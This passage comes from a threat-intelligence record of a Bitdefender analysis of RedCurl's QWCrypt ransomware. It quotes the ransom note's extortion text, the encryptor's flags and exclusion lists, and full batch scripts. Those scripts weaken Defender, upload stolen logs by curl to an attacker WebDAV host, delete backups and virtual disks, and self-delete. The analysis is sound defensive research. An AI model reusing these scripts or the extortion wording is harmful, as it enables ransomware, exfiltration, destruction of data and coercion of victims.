world.\r\n\u003e\u003e\u003e\u003e\u003e What guarantee is there that we won't cheat you?\r\nWe are one of the most famous ransomware group, nothing is more important than our reputation. We are not a\r\npolitically motivated group and we want nothing more than money. If you pay, we will provide you with\r\ndecryption software. After you pay the ransom, you will quickly make even more money. Look at this situation\r\nsimply as a paid training for your system administrators, because it is due to your corporate network not being\r\nproperly configured that we were able to attack you. Our pentest services should be paid just like you pay the\r\nsalaries of your system administrators. Get over it and pay for it.\r\n\u003e\u003e\u003e\u003e\u003e Warning! Do not delete or modify encrypted files, it will lead to problems with decryption of files!\r\n\u003e\u003e\u003e\u003e Very important! For those who have cyber insurance against ransomware attacks.\r\nInsurance companies require you to keep your insurance information secret, this is to never pay the maximum\r\namount specified in the contract or to pay nothing at all, disrupting negotiations. The insurance company will try\r\nto derail negotiations in any way they can so that they can later argue that you will be denied coverage because\r\nyour insurance does not cover the ransom amount. For example your company is insured for 10 million dollars,\r\nwhile negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for\r\nexample 100 thousand dollars, we will refuse the paltry amount and ask for example the amount of 15 million\r\ndollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars. He will do\r\nanything to derail negotiations and refuse to pay us out completely and leave you alone with your problem. If you\r\ntold us anonymously that your company was insured for $10 million and other important details regarding\r\ninsurance coverage, we would not demand more than $10 million in correspondence with the insurance agent.\r\nThat way you would have avoided a leak and decrypted your information. But since the sneaky insurance agent\r\npurposely negotiates so as not to pay for the insurance claim, only the insurance company wins in this situation.\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 13 of 21\n\nTo avoid all this and get the money on the insurance, be sure to inform us anonymously about the availability and\r\nterms of insurance coverage, it benefits both you and us, but it does not benefit the insurance company. Poor\r\nmultimillionaire insurers will not starve and will not become poorer from the payment of the maximum amount\r\nspecified in the contract, because everyone knows that the contract is more expensive than money, so let them\r\nfulfill the conditions prescribed in your insurance contract, thanks to our interaction.\r\n\u003e\u003e\u003e\u003e\u003e If you do not pay the ransom, we will attack your company again in the future.\r\nrbcw.exe Arguments\r\nThis is a longer description that spans multiple lines and likely contains examples and usage of using your\r\napplication.\r\nFor example:\r\nCobra is a CLI library for Go that empowers applications. This application is a tool to generate the needed files to\r\nquickly create a Cobra application.\r\nUsage:\r\nqwc [flags]\r\nFlags:\r\n     --block-size string     AES Block size (default \"1M\")\r\n     --chacha                 Use ChaCha20 algorithm\r\n     --dryrun                 Do not modify anything\r\n     --excludeVM string       Exclude VMs (csv list)\r\n     --folder stringArray     Folders to serch files (default [all])\r\n     --full-enc-less string   Full encrypt files less than (default \"50M\")\r\n-h, --help                   help for qwc\r\n     --hv                     Encrypt HyperV VMs\r\n-i, --info                   Print system info\r\n-k, --key string             Vars key\r\n     --kill                   Kill VM process\r\n     --log string             Log file\r\n     --maxsize string         Vars key (default \"0\")\r\n     --minsize string         Vars key (default \"0\")\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 14 of 21\n\n--nosd                   Do not self delete\r\n     --noshadowdelete         Do not delete shadow copies\r\n     --skip-count int         Skip blocks count (default 5)\r\n     --threads int           Cryptor thread count (default 10)\r\n     --turnoff               TurnOff HyperV VMs (default true)\r\nThere can also be a longer description that spans multiple lines and likely contains examples and usage of using\r\nyour application.\r\nFor example:\r\nCobra is a CLI library for Go that empowers applications.\r\nThis application is a tool to generate the needed files\r\nto quickly create a Cobra application.\r\nUsage:\r\nqwc [flags]\r\nFlags:\r\n     --block-size string     AES Block size (default \"1M\")\r\n     --chacha                 Use ChaCha20 algorithm\r\n     --dryrun                 Do not modify anything\r\n     --excludeVM string       Exclude VMs (csv list)\r\n     --folder stringArray     Folders to serch files (default [all])\r\n     --full-enc-less string   Full encrypt files less than (default \"50M\")\r\n-h, --help                   help for qwc\r\n     --hv                     Encrypt HyperV VMs\r\n-i, --info                   Print system info\r\n-k, --key string             Vars key\r\n     --kill                   Kill VM process\r\n     --log string             Log file\r\n     --maxsize string         Vars key (default \"0\")\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 15 of 21\n\n--minsize string         Vars key (default \"0\")\r\n     --nosd                   Do not self delete\r\n     --noshadowdelete         Do not delete shadow copies\r\n     --skip-count int         Skip blocks count (default 5)\r\n     --threads int           Cryptor thread count (default 10)\r\n     --turnoff               TurnOff HyperV VMs (default true)\r\n     --verbose             Use verbose output format\r\nExclusion Rules\r\nThe config also contains exceptions for directories and files.\r\nExcluded Directories\r\nC:\\\\Windows\\\\\r\nC:\\\\Program Files\\\\Common Files\\\\\r\nC:\\\\Program Files\\\\Windows NT\\\\\r\nC:\\\\Program Files\\\\Windows Defender\r\nC:\\\\Program Files\\\\Malwarebytes\\\\\r\nC:\\\\Program Files\\\\VIPRE Business Agent\\\\\r\nC:\\\\Program Files\\\\WindowsApps\\\\\r\nC:\\\\Program Files\\\\Windows Media Player\\\\\r\nC:\\\\Program Files\\\\Update Services\\\\\r\nC:\\\\Program Files\\\\Microsoft\\.NET\\\\\r\nC:\\\\Program Files\\\\Internet Explorer\\\\\r\nC:\\\\Program Files\\\\Bitdefender\r\nC:\\\\Program Files\\\\WindowsPowerShell\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Common Files\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Internet Explorer\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Microsoft\\.NET\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Microsoft\\\\Edge\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Media\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows NT\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\WindowsPowerShell\\\\\r\nC:\\\\ProgramData\\\\\r\n\\\\AppData\\\\Local\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Defender\r\nCynet Ransom Protection\r\nC:\\\\Program Files \\(x86\\)\\\\Windows Media Player\\\\\r\nC:\\\\Program Files \\(x86\\)\\\\SentinelOne\\\\\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 16 of 21\n\nC:\\\\Program Files\\\\SentinelOne\\\\\r\n\\\\AppData\\\\Roaming\\\\\r\nC:\\\\Windows\\.old\\\\\r\nSystem Volume Information\r\n:\\\\\\$\r\n\\\\Users\\\\\\$\r\n\\\\\\$\\w{32}\\\\\r\n\\\\afterSentDocuments\\\\\r\nExcluded Files\r\n.exe$\r\n.dll$\r\n.sys$\r\n.ocx$\r\n.dat$\r\n.lnk$\r\n.locked$\r\n.randombits$\r\nNTUSER.DAT\r\nDumpStack.log\r\nbootmgr$\r\n!!!how_to_unlock_randombits_files.txt$\r\nLauncher Script\r\nIF /I %~1 == --pass (set tpass=%2) ELSE GOTO stop\r\nIF /I %~3 == --main (set tmain=%4) ELSE GOTO stop\r\nIF /I %~5 == --key (set tkey=%6) ELSE GOTO stop\r\nset timeout=%8\r\ntimeout/T %timeout% if exist \"C:\\Program Files\\PowerShell\\7\\pwsh.exe\" (set pwsh=pwsh.exe) ELSE (set\r\npwsh=powershell.exe)\r\n%pwsh% -nop -c \"Set-MpPreference -MAPSReporting 0\"\r\n%pwsh% -nop -c \"Set-MpPreference -SubmitSamplesConsent NeverSend\"\r\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\ProgramData\\*\"\r\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\Windows\\system32\\*\"\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 17 of 21\n\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\ProgramData\"\r\n%pwsh% -nop -c \"Add-MpPreference -ExclusionPath C:\\Windows\\system32\"\r\nset wdir=%ALLUSERSPROFILE%\r\ncd %wdir%\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass% C:\\ProgramData\\%tmain%.tmp\r\nstart \"\" /D %wdir% cmd.exe /c %wdir%\\rnm.bat --pass %tpass% --main\r\n%tmain% --key %tkey%\r\n:stop\r\ndel %0\r\nMain Script\r\nIF /I %~1 == --pass (set tpass=%2) ELSE GOTO stop\r\nIF /I %~3 == --main (set tmain=%4) ELSE GOTO stop\r\nIF /I %~5 == --key (set tkey=%6) ELSE GOTO stop\r\nset slog=\u003credacted\u003e\r\nset spass=\u003credacted\u003e\r\nset ppass=\u003credacted\u003e\r\nset davstr=hxxps://mia[.]nl[.]tab[.]digital/remote[.]php/dav/files/\u003credacted\u003e\r\nset davfld=LOGS\r\nif exist \"C:\\Program Files\\PowerShell\\7\\pwsh.exe\" (set pwsh=pwsh.exe) ELSE (set pwsh=powershell.exe)\r\nset wdir=%ALLUSERSPROFILE%\r\nset tdir=temp_3a3352baf\r\ncd %wdir%\r\nmkdir %tdir%\r\nsc stop Term\r\nsc delete Term\r\ntasklist\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nstart \"\" /D %wdir% cmd.exe /c %wdir%\\term.exe\r\ntimeout /T 20\r\nver \u003e nul\r\ntasklist /fi \"imagename eq term.exe\" | findstr /B /I /C:\"term.exe\" \u003eNUL\r\nIF ERRORLEVEL 1 (start cmd.exe /c %wdir%\\term.exe\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 18 of 21\n\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho RESTART_TERM\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261)\r\ntasklist\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nwmic path win32_process get Caption,Processid,Commandline\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\necho =======\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\nwmic logicaldisk get description,name,Size,FreeSpace\u003e\u003e%tdir%\\%computername%_main.log 2\u003e\u00261\r\n::%pwsh% -nop -c \"$MCFP = New-Object -ComObject\r\nMSXML2.XMLHTTP;$MCFP.Open('PUT',$env:davstr+'/'+$env:davfld+'/RUN/'+$env:computername+'.tmp',\r\n$False, $env:slog, $env:spass);$MCFP.Send();\"\r\necho \u003e%wdir%\\a001.tmp\r\nC:\\ProgramData\\curl.exe -T %wdir%\\a001.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RUN/%computername%.tmp\r\ndel /f /q %wdir%\\a001.tmp\r\n::DELETE\r\nif %computername%==\u003cHOSTNAME1\u003e (rd /S /Q \"G:\\backup\" rd /S /Q \"G:\\backup images\"\r\ndel /F /Q \"G:\\*.vhdx\"\r\nrd /S /Q \"J:\\Backup\"\r\nrd /S /Q \"J:\\Storage\")\r\nif %computername%==\u003cHOSTNAME2\u003e (del /F /Q \"D:\\\u003credacted\u003e\\Virtual Hard Disks\\disk1.vhdx\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\Virtual Hard Disks\\disk2.vhdx\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\*.*\"\r\ndel /F /Q \"D:\\\u003credacted\u003e\\old\\*.*\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\d_drive.vhdx\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\\u003credacted\u003e.vhdx\"\r\ndel /F /Q \"E:\\\u003credacted\u003e\\Virtual Hard Disks\\trans_log.vhdx\"\r\ndel /F /Q \"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\d_drive.vhdx\"\r\ndel /F /Q \"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\\u003credacted\u003e.vhdx\"\r\ndel /F /Q \"E:\\\u003cuser\u003e\\\u003credacted\u003e\\Virtual Hard Disks\\trans_log.vhdx\"\r\ndel /F /Q \"F:\\backup\\*.*\"\r\nrd /S /Q \"F:\\backup\\\")\r\n::DELETE\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 19 of 21\n\n::RBC\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass%\r\nC:\\ProgramData\\%tmain%2.tmp\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_1.log 2\u003e\u00261\r\nrbcw.exe --hv --excludeVM \"wingate\u003csubnet1\u003e,wingate,wingate\u003csubnet2\u003e\" --key %tkey% --nosd\r\n\u003e%tdir%\\%computername%_rbcw_hv_2.log 2\u003e\u00261\r\ndel /f /q C:\\Windows\\Temp\\rnl.tmp\r\nC:\\ProgramData\\7za.exe a -p%ppass% -mhe=on -y C:\\Windows\\Temp\\rnl.tmp %tdir%\r\nC:\\ProgramData\\curl.exe -T C:\\Windows\\Temp\\rnl.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RES/%computername%_01_%random%.tmp\r\nrbcw.exe --key %tkey% --nosd \u003e%tdir%\\%computername%_rbcw_1.log 2\u003e\u00261\r\nrbcw.exe --key %tkey% \u003e%tdir%\\%computername%_rbcw_2.log 2\u003e\u00261\r\n::RBC\r\ndel /f /q C:\\Windows\\Temp\\rnl.tmp\r\nC:\\ProgramData\\7za.exe a -p%ppass% -mhe=on -sdel -y\r\nC:\\Windows\\Temp\\rnl.tmp %tdir%\r\nC:\\ProgramData\\curl.exe -T C:\\Windows\\Temp\\rnl.tmp -u %slog%:%spass%\r\n%davstr%/%davfld%/RES/%computername%_02_%random%.tmp\r\nC:\\ProgramData\\7za.exe x -aoa -p%tpass% C:\\ProgramData\\%tmain%3.tmp\r\nstart cmd.exe /c %wdir%\\rnfin.bat\r\ntaskkill /IM term.exe /F\r\nsc stop Term\r\nsc delete Term\r\ndel /F /Q term.exe\r\ndel /F /Q term.sys\r\ndel /F /Q rbcw.exe\r\ndel /F /Q 7za.exe\r\ndel /F /Q curl.exe\r\n::del /F /Q C:\\Windows\\Temp\\rnl.tmp\r\ndel /F /Q %tmain%.tmp\r\ndel /F /Q %tmain%2.tmp\r\ndel /F /Q %tmain%3.tmp\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 20 of 21\n\nrd /S /Q %tdir%\r\n:stop\r\ndel %0\r\nSource: https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nhttps://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive" ], "report_names": [ "redcurl-qwcrypt-ransomware-technical-deep-dive" ], "threat_actors": [ { "id": "6ec2cd63-307d-4281-86da-5dc199e932af", "created_at": "2025-08-07T02:03:24.821494Z", "updated_at": "2026-04-10T02:00:03.843522Z", "deleted_at": null, "main_name": "GOLD BLADE", "aliases": [ "Earth Kapre ", "Red Wolf ", "RedCurl " ], "source_name": "Secureworks:GOLD BLADE", "tools": [ "RedLoader" ], "source_id": "Secureworks", "reports": null }, { "id": "f72f2981-0dc4-4d96-857c-a725a143a538", "created_at": "2024-03-21T02:00:04.724563Z", "updated_at": "2026-04-10T02:00:03.602417Z", "deleted_at": null, "main_name": "Earth Kapre", "aliases": [ "RedCurl", "Red Wolf", "GOLD BLADE" ], "source_name": "MISPGALAXY:Earth Kapre", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "79e95381-8008-48dc-b981-fd66e1c46ca6", "created_at": "2022-10-25T16:07:24.110478Z", "updated_at": "2026-04-10T02:00:04.869039Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "Earth Kapre", "Red Wolf" ], "source_name": "ETDA:RedCurl", "tools": [ "Impacket", "LaZagne" ], "source_id": "ETDA", "reports": null }, { "id": "8108d548-e30f-4b90-aa60-71323ba66678", "created_at": "2024-11-01T02:00:52.667098Z", "updated_at": "2026-04-10T02:00:05.343786Z", "deleted_at": null, "main_name": "RedCurl", "aliases": [ "RedCurl" ], "source_name": "MITRE:RedCurl", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434201, "ts_updated_at": 1775826737, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.pdf", "text": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.txt", "img": "https://archive.orkl.eu/e83136e0de330e727cf98f00e40c410e2138a9b9.jpg" } }